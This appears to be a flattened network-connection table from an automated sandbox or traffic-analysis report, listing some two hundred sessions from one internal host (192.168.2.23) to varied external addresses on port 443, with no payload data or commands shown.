                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24334192.168.2.2337430176.186.91.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24335192.168.2.2333318220.123.239.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24336192.168.2.2350390128.146.98.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24337192.168.2.2337908223.217.98.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24338192.168.2.2334754137.65.254.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24339192.168.2.233943625.190.73.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24340192.168.2.233530661.133.11.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24341192.168.2.23490185.5.229.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24342192.168.2.2355134122.100.43.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24343192.168.2.2360202106.12.60.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24344192.168.2.2337390202.137.71.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24345192.168.2.234488073.140.251.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24346192.168.2.2343722207.17.254.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24347192.168.2.2357180220.87.229.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24348192.168.2.2349300148.149.17.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24349192.168.2.2339970206.26.149.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24350192.168.2.236079254.193.154.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24351192.168.2.2332898180.230.94.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24352192.168.2.234816814.195.197.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24353192.168.2.2333924187.103.53.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24354192.168.2.2344684150.118.0.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24355192.168.2.2336862104.219.81.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24356192.168.2.2360994137.112.186.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24357192.168.2.2355888189.159.248.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24358192.168.2.2336782216.203.204.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24359192.168.2.2338172197.237.210.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24360192.168.2.234313658.86.88.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24361192.168.2.2359402163.115.43.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24362192.168.2.2340328155.167.187.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24363192.168.2.234305824.174.211.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24364192.168.2.235948041.33.112.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24365192.168.2.2355246122.186.107.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24366192.168.2.234336472.75.229.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24367192.168.2.235311662.88.201.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24368192.168.2.235195265.199.204.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24369192.168.2.2337956187.100.21.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24370192.168.2.233991084.33.178.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24371192.168.2.234112699.161.58.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24372192.168.2.233757827.47.246.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24373192.168.2.235218697.148.208.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24374192.168.2.233636872.169.109.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24375192.168.2.235386019.44.225.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24376192.168.2.2349092132.81.166.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24377192.168.2.235307442.220.193.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24378192.168.2.2350810196.45.205.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24379192.168.2.2346532170.139.59.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24380192.168.2.2352764102.20.119.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24381192.168.2.234993057.205.230.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24382192.168.2.2334880120.202.73.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24383192.168.2.235665494.84.4.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24384192.168.2.2346342204.63.55.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24385192.168.2.2345152205.184.27.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24386192.168.2.2357020108.224.0.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24387192.168.2.233836669.107.45.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24388192.168.2.2354100218.178.208.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24389192.168.2.235329634.20.123.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24390192.168.2.234634058.36.151.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24391192.168.2.233945620.42.132.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24392192.168.2.2351726188.194.201.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24393192.168.2.2336400204.119.238.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24394192.168.2.234968859.41.16.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24395192.168.2.2349286121.15.236.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24396192.168.2.2338324148.78.0.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24397192.168.2.2334124216.73.200.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24398192.168.2.2332998146.199.202.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24399192.168.2.234073413.119.224.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24400192.168.2.235285642.36.228.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24401192.168.2.2358750205.67.210.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24402192.168.2.2333338158.45.2.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24403192.168.2.233721013.220.184.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24404192.168.2.233567019.126.15.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24405192.168.2.2340432221.249.138.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24406192.168.2.235723886.232.100.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24407192.168.2.2342650218.131.236.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24408192.168.2.233678482.46.122.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24409192.168.2.2348370129.51.64.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24410192.168.2.2350168179.96.145.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24411192.168.2.2333344171.152.63.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24412192.168.2.233945442.28.97.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24413192.168.2.233437639.254.192.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24414192.168.2.2337238223.99.7.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24415192.168.2.235348620.1.156.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24416192.168.2.2347368108.87.130.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24417192.168.2.2347396198.143.58.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24418192.168.2.235566879.59.76.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24419192.168.2.235849068.54.123.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24420192.168.2.2358406153.97.141.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24421192.168.2.233624096.160.161.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24422192.168.2.234034080.231.205.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24423192.168.2.233524631.73.102.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24424192.168.2.235767432.122.78.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24425192.168.2.2355518164.240.90.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24426192.168.2.2356608141.96.138.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24427192.168.2.235018888.91.173.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24428192.168.2.2344406212.66.113.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24429192.168.2.233816663.19.93.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24430192.168.2.2332970174.45.94.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24431192.168.2.234013619.85.207.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24432192.168.2.235725271.193.75.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24433192.168.2.2345242108.134.25.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24434192.168.2.235215079.3.73.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24435192.168.2.2339046131.35.16.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24436192.168.2.233471235.134.176.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24437192.168.2.233837663.132.144.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24438192.168.2.2341988210.16.140.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24439192.168.2.2337748208.38.19.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24440192.168.2.2349018156.17.210.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24441192.168.2.2357002134.82.174.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24442192.168.2.2354100219.134.20.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24443192.168.2.2345458122.156.242.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24444192.168.2.234532450.127.105.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24445192.168.2.234547637.221.110.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24446192.168.2.2339170131.45.196.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24447192.168.2.234096892.129.127.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24448192.168.2.235658658.101.48.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24449192.168.2.233996089.93.156.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24450192.168.2.2349646114.177.41.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24451192.168.2.234733876.187.105.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24452192.168.2.2352096222.31.167.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24453192.168.2.2353716113.47.132.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24454192.168.2.2358492101.161.0.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24455192.168.2.2355390122.95.42.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24456192.168.2.2346518121.59.225.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24457192.168.2.2360428216.102.227.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24458192.168.2.235512042.197.75.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24459192.168.2.2347314175.159.43.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24460192.168.2.236069264.147.1.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24461192.168.2.2337092142.83.111.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24462192.168.2.2351118101.52.131.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24463192.168.2.234481096.108.90.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24464192.168.2.235744668.123.218.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24465192.168.2.2346580148.78.248.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24466192.168.2.2333158177.239.44.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24467192.168.2.2333738152.234.167.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24468192.168.2.235638278.182.219.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24469192.168.2.2355744206.33.13.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24470192.168.2.2357612146.2.41.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24471192.168.2.2340924133.128.32.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24472192.168.2.235430271.81.123.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24473192.168.2.235904283.239.54.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24474192.168.2.233764247.32.197.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24475192.168.2.2353622205.238.9.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24476192.168.2.23383429.134.49.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24477192.168.2.2353642181.98.244.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24478192.168.2.233613482.200.72.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24479192.168.2.2334942122.124.106.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24480192.168.2.2334004213.37.7.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24481192.168.2.2338276120.221.236.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24482192.168.2.2356848157.110.133.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24483192.168.2.2354444216.50.239.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24484192.168.2.2347708144.22.190.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24485192.168.2.2357588102.109.31.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24486192.168.2.233994857.166.183.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24487192.168.2.234481462.157.237.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24488192.168.2.235048083.179.86.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24489192.168.2.234162047.113.130.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24490192.168.2.2333450115.34.211.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24491192.168.2.2341334182.234.213.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24492192.168.2.235082047.211.228.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24493192.168.2.2346548146.219.95.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24494192.168.2.2341154119.105.142.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24495192.168.2.2360334130.255.234.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24496192.168.2.2348116201.35.37.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24497192.168.2.2338374168.227.174.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24498192.168.2.2346210203.77.72.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24499192.168.2.2344456113.65.219.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24500192.168.2.235969494.138.179.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24501192.168.2.235094080.101.252.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24502192.168.2.2360888133.19.149.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24503192.168.2.2348808221.48.71.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24504192.168.2.2342994170.77.86.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24505192.168.2.2360636162.80.125.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24506192.168.2.233911493.149.208.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24507192.168.2.2358640199.30.206.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24508192.168.2.2358186103.78.5.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24509192.168.2.2346730151.56.84.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24510192.168.2.2334478103.52.171.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24511192.168.2.234033874.112.11.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24512192.168.2.235501883.61.19.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24513192.168.2.2346058119.231.148.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24514192.168.2.2350694202.128.231.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24515192.168.2.2343368175.47.151.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24516192.168.2.235880280.212.106.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24517192.168.2.2337698144.37.38.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24518192.168.2.234146820.94.226.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24519192.168.2.234711268.167.255.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24520192.168.2.233478862.37.71.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24521192.168.2.234880273.2.144.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24522192.168.2.2345000211.241.79.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24523192.168.2.2343688109.52.90.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24524192.168.2.2342288114.142.0.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24525192.168.2.2346586101.179.91.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24526192.168.2.2346264111.209.37.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24527192.168.2.2356994154.120.44.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24528192.168.2.2343684155.96.94.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24529192.168.2.2346874212.218.171.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24530192.168.2.233333248.78.88.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24531192.168.2.233406087.74.184.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24532192.168.2.2349572193.66.224.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24533192.168.2.2337414189.198.102.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24534192.168.2.2336582198.200.37.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24535192.168.2.233622292.125.1.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24536192.168.2.2358898101.192.94.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24537192.168.2.235185474.175.140.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24538192.168.2.2340656108.107.114.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24539192.168.2.234751484.246.61.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24540192.168.2.2355150177.163.135.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24541192.168.2.2355350212.62.181.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24542192.168.2.2337352118.22.20.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24543192.168.2.235684024.197.214.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24544192.168.2.235923897.154.0.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24545192.168.2.234501490.191.45.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24546192.168.2.234296034.20.134.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24547192.168.2.2338616163.165.208.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24548192.168.2.2352964179.204.46.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24549192.168.2.233935072.109.139.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24550192.168.2.234632068.182.246.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24551192.168.2.2359452109.237.35.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24552192.168.2.2345122134.98.117.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24553192.168.2.2336082110.165.201.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24554192.168.2.2347574222.198.187.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
